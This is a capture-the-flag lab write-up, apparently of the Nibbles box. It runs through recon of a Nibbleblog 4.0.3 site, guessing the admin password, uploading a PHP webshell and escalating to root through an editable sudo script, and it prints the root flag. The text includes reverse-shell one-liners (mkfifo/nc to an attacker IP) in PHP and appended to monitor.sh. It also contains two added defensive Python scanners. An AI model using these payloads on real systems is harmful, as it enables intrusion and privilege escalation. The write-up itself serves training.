Questions

[screenshot: 2024-01-18T09:35:08.png]
[screenshot: 2024-01-18T11:48:11.png]

Solution


Question 1


Finding hidden information with curl

┌──(root㉿HgTrojan)-[~]
└─# curl 10.129.196.108                                    
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Brute-forcing directories with dirsearch
[screenshot: 2024-01-18T08:35:52.png]

curl the README for more information: 'Directory "content" writable by Apache/PHP'

┌──(root㉿HgTrojan)-[~]
└─# curl 10.129.196.108/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog

===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP

Optionals requirements

Trying http://10.129.196.108/nibbleblog/content/ shows that config.xml exists there.
[screenshot: 2024-01-18T08:46:24.png]
Opening config.xml reveals that the username is admin.
[screenshot: 2024-01-18T08:47:29.png]
Run cewl against it to try to find the password.

┌──(root㉿HgTrojan)-[~]
└─# cewl 10.129.113.150/nibbleblog/content/private/config.xml         
CeWL 6.1 (Max Length) Robin Wood ([email protected]) (https://digi.ninja/)
nibbleblog
NibblesYum
yumPowered
Nibbleblog
http
USUTC
Yen
auto
landscapesimpler
admin
nibbles
comnoreply
Nibbles
Yum
yum

After a few attempts the password turns out to be nibbles; admin:nibbles gets us into the /admin/ directory.
[screenshot: 2024-01-18T08:50:25.png]

In the plugin upload interface, try uploading a PHP one-liner webshell. An error is thrown, but the upload still goes through.
[screenshot: 2024-01-18T08:56:27.png]

Look at the error messages together with the directories found earlier.

Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26

Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27

Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117

Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118

Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43

Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80

Directories:

┌──(root㉿HgTrojan)-[~]
└─# dirsearch -u 10.129.196.108/nibbleblog/
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                         
 (_||| _) (/_(_|| (_| )                                                                                                  
                                                                                                                         
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.129.196.108-nibbleblog-_24-01-18_03-41-46.txt

Error Log: /root/.dirsearch/logs/errors-24-01-18_03-41-46.log

Target: http://10.129.196.108/nibbleblog/

[03:41:48] Starting: 
[03:42:11] 403 -  311B  - /nibbleblog/.ht_wsr.txt                          
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess.bak1                       
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess.orig
[03:42:11] 403 -  316B  - /nibbleblog/.htaccess.sample
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess.save
[03:42:11] 403 -  312B  - /nibbleblog/.htaccess_sc
[03:42:11] 403 -  315B  - /nibbleblog/.htaccess_extra
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess_orig
[03:42:11] 403 -  312B  - /nibbleblog/.htaccessBAK
[03:42:12] 403 -  312B  - /nibbleblog/.htaccessOLD
[03:42:12] 403 -  313B  - /nibbleblog/.htaccessOLD2
[03:42:12] 403 -  305B  - /nibbleblog/.html
[03:42:12] 403 -  304B  - /nibbleblog/.htm                                 
[03:42:12] 403 -  311B  - /nibbleblog/.httr-oauth
[03:42:12] 403 -  310B  - /nibbleblog/.htpasswds
[03:42:12] 403 -  314B  - /nibbleblog/.htpasswd_test                       
[03:42:20] 403 -  304B  - /nibbleblog/.php                                 
[03:42:20] 403 -  305B  - /nibbleblog/.php3                                
[03:42:41] 200 -    1KB - /nibbleblog/COPYRIGHT.txt                         
[03:42:46] 200 -   34KB - /nibbleblog/LICENSE.txt                           
[03:42:48] 200 -    5KB - /nibbleblog/README                                
[03:43:09] 301 -  327B  - /nibbleblog/admin  ->  http://10.129.196.108/nibbleblog/admin/
[03:43:11] 200 -    1KB - /nibbleblog/admin.php                             
[03:43:12] 403 -  315B  - /nibbleblog/admin/.htaccess                       
[03:43:12] 200 -    2KB - /nibbleblog/admin/?/login
[03:43:12] 200 -    2KB - /nibbleblog/admin/                                
[03:43:15] 301 -  338B  - /nibbleblog/admin/js/tinymce  ->  http://10.129.196.108/nibbleblog/admin/js/tinymce/
[03:43:15] 200 -    2KB - /nibbleblog/admin/js/tinymce/                     
[03:44:15] 301 -  329B  - /nibbleblog/content  ->  http://10.129.196.108/nibbleblog/content/
[03:44:15] 200 -    1KB - /nibbleblog/content/                              
[03:44:51] 200 -    3KB - /nibbleblog/index.php                             
[03:44:51] 200 -    3KB - /nibbleblog/index.php/login/                      
[03:44:52] 200 -   78B  - /nibbleblog/install.php                           
[03:44:58] 301 -  331B  - /nibbleblog/languages  ->  http://10.129.196.108/nibbleblog/languages/
[03:45:38] 301 -  329B  - /nibbleblog/plugins  ->  http://10.129.196.108/nibbleblog/plugins/
[03:45:38] 200 -    4KB - /nibbleblog/plugins/                              
[03:46:19] 301 -  328B  - /nibbleblog/themes  ->  http://10.129.196.108/nibbleblog/themes/
[03:46:20] 200 -    2KB - /nibbleblog/themes/                               
[03:46:24] 200 -    2KB - /nibbleblog/update.php                            
                                                                             
Task Completed    

The first guess is that the webshell landed in a /plugins/ directory, but both /nibbleblog/ and /nibbleblog/content/private/ contain a /plugins directory.
Visiting each in turn shows that only the one under content contains a db.xml.
Browsing http://10.129.196.108/nibbleblog/content/private/plugins/ and then http://10.129.196.108/nibbleblog/content/private/plugins/about/ reveals a suspicious file:
[screenshot: 2024-01-18T09:17:10.png]
curl confirms it is the image.php webshell we uploaded.

┌──(root㉿HgTrojan)-[~]
└─# curl http://10.129.196.108/nibbleblog/content/private/plugins/about/profile_picture.php
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Good. Note that address; now build a reverse shell by changing the code in image.php:

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.39(your IP) 9443 >/tmp/f"); ?>

Then upload it and start a listener on port 9443.

┌──(kali㉿HgTrojan)-[~]
└─$ nc -lvnp 9443
listening on [any] 9443 ...

Request http://10.129.196.108/nibbleblog/content/private/plugins/about/profile_picture.php so that the server executes the code.
The reverse shell comes back:
[screenshot: 2024-01-18T09:25:51.png]
A few directory changes later, the target is found in /home/nibbler.
[screenshot: 2024-01-18T09:36:23.png]
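As an added, defender-side example (not part of this write-up): the upload above only works because the web-writable "content" tree also executes PHP. The check below walks such an upload directory and flags anything that would run as code, whether by a PHP-family extension or by a PHP open tag in the leading bytes of a file that pretends to be an image. The directory layout, file names and contents are constructed here to mirror the write-up, not taken from a real host.

```python
# Added example, not part of the original write-up: a defender-side check for the
# weakness this box relies on, a web-writable "content" tree that also executes
# PHP. It walks an upload directory and flags anything that would run as code:
# files with a PHP-family extension, and files of any extension whose leading
# bytes hold a PHP open tag (a script renamed to .jpg). Paths are assumptions;
# the sample tree is constructed in a temp directory and mirrors the write-up.
import os
import tempfile
from pathlib import Path

PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_TAGS = (b"<?php", b"<?=")
HEAD_BYTES = 4096  # inspect only the start of each file

def classify(path):
    """Return why a file is suspicious, or None if it looks like plain data."""
    if path.suffix.lower() in PHP_EXTENSIONS:
        return "php-extension"
    with path.open("rb") as fh:
        head = fh.read(HEAD_BYTES)
    if any(tag in head for tag in PHP_TAGS):
        return "php-tag-in-body"
    return None

def scan_upload_tree(root):
    """Walk root and return sorted (relative path, reason) for flagged files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath, name)
            reason = classify(path)
            if reason:
                findings.append((str(path.relative_to(root)), reason))
    return sorted(findings)

def build_sample_tree():
    """Constructed layout following the write-up (content/private/plugins/about)."""
    root = tempfile.mkdtemp()
    about = Path(root, "private", "plugins", "about")
    about.mkdir(parents=True)
    # genuine JPEG magic plus filler: must not be flagged
    (about / "avatar.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    # the uploaded script from the write-up, by name: flagged on extension
    (about / "profile_picture.php").write_bytes(b"<?php echo 'marker'; ?>")
    # the same content renamed to look like an image: flagged on its body
    (about / "profile_picture.jpg").write_bytes(b"<?php echo 'marker'; ?>")
    Path(root, "private", "config.xml").write_bytes(b"<config/>")
    return root
```

Run it periodically against the real content directory (or from a file-change hook) and treat any finding as an incident; the extension check alone misses renamed scripts, which is why both tests are applied.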


Question 2


On the local machine: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
LinEnum is a shell script that automatically collects local information from a Linux host; we bring in LinEnum.sh to run some automated privilege-escalation checks.

┌──(root㉿HgTrojan)-[~]
└─# sudo python3 -m http.server 8080

On the machine where we have the reverse shell:

wget http://10.10.16.39:8080/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh sudo

If the local machine logs "10.129.196.108 - - [18/Jan/2024 04:58:58] "GET /LinEnum.sh HTTP/1.1" 200 -", the transfer succeeded.

Once it has finished, append a reverse-shell one-liner to the end of monitor.sh:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.39 54321 >/tmp/f' | tee -a monitor.sh

Start a listener locally on port 54321:

┌──(kali㉿HgTrojan)-[~]
└─$ nc -lvnp 54321
listening on [any] 54321 ...

Then run LinEnum.sh first and monitor.sh afterwards:

bash LinEnum.sh
sudo /home/nibbler/personal/stuff/monitor.sh 
# Remember: when running monitor.sh with sudo, use the full path.

Now wait for the listener to catch the root shell.
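As an added, defender-side example (not part of this write-up): the escalation above works because sudo lets nibbler run, as root, a script that nibbler also owns and can edit. The audit below parses sudoers-style rules and reports every command file the rule's user could modify. The sudoers text, user names, uids and paths are all constructed here in a temporary directory; nothing is read from /etc.

```python
# Added example, not part of the original write-up: an audit for the escalation
# used above, where sudo lets nibbler run a script that nibbler can also edit.
# It parses sudoers-style rules (constructed below, not read from /etc) and
# reports every command file the rule's user could modify: owned by that user
# (the owner can always chmod it) or group/world writable. Names, uids and
# paths are assumptions; the sample files are created in a temp directory.
import os
import re
import stat
import tempfile
from pathlib import Path

RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*"
                     r"(?:[A-Z]+:\s*)*(?P<cmds>.+)$")

def parse_rules(text):
    """Yield (user, runas, command_path) for each user specification line."""
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if m and not line.lstrip().startswith(("#", "Defaults")):
            for cmd in m.group("cmds").split(","):
                yield m.group("user"), m.group("runas"), cmd.split()[0]

def writable_by(path, uid, gids):
    """True if a user with this uid and these gids can modify the file."""
    st = os.stat(path)
    group_w = st.st_gid in gids and st.st_mode & stat.S_IWGRP
    return st.st_uid == uid or bool(group_w or st.st_mode & stat.S_IWOTH)

def audit(sudoers_text, user_ids):
    """Return (user, runas, path) for sudo commands the user can also edit."""
    return [(u, r, p) for u, r, p in parse_rules(sudoers_text)
            if u in user_ids and p != "ALL" and os.path.isfile(p)
            and writable_by(p, *user_ids[u])]

def build_sample():
    """Constructed scenario: monitor.sh owned by the sudoer, as in the write-up."""
    root = Path(tempfile.mkdtemp())
    monitor = root / "home/nibbler/personal/stuff/monitor.sh"
    backup = root / "usr/local/bin/backup.sh"
    for script in (monitor, backup):
        script.parent.mkdir(parents=True)
        script.write_text("#!/bin/bash\necho placeholder\n")
        script.chmod(0o755)  # neither group- nor world-writable
    sudoers = ("Defaults env_reset\nroot ALL=(ALL:ALL) ALL\n"
               f"nibbler ALL=(root) NOPASSWD: {monitor}\n"
               f"www-data ALL=(root) NOPASSWD: {backup}\n")
    # nibbler maps to the uid that created the files, www-data to a foreign uid
    users = {"nibbler": (os.getuid(), set()), "www-data": (os.getuid() + 1, set())}
    return sudoers, users, str(monitor), str(backup)
```

The fix the audit points at is the usual one: sudo targets must be root-owned and not writable by the invoking user, or the rule is equivalent to granting a root shell.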

[screenshot: 2024-01-18T10:15:01.png]
[screenshot: 2024-01-18T11:45:09.png]

Finally, grab the flag:

┌──(root㉿HgTrojan)-[~]
└─# nc -lvnp 54321
listening on [any] 54321 ...
connect to [10.10.16.39] from (UNKNOWN) [10.129.66.35] 39668
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
de5e5d6619862a8aa5b9b212314e0cdd
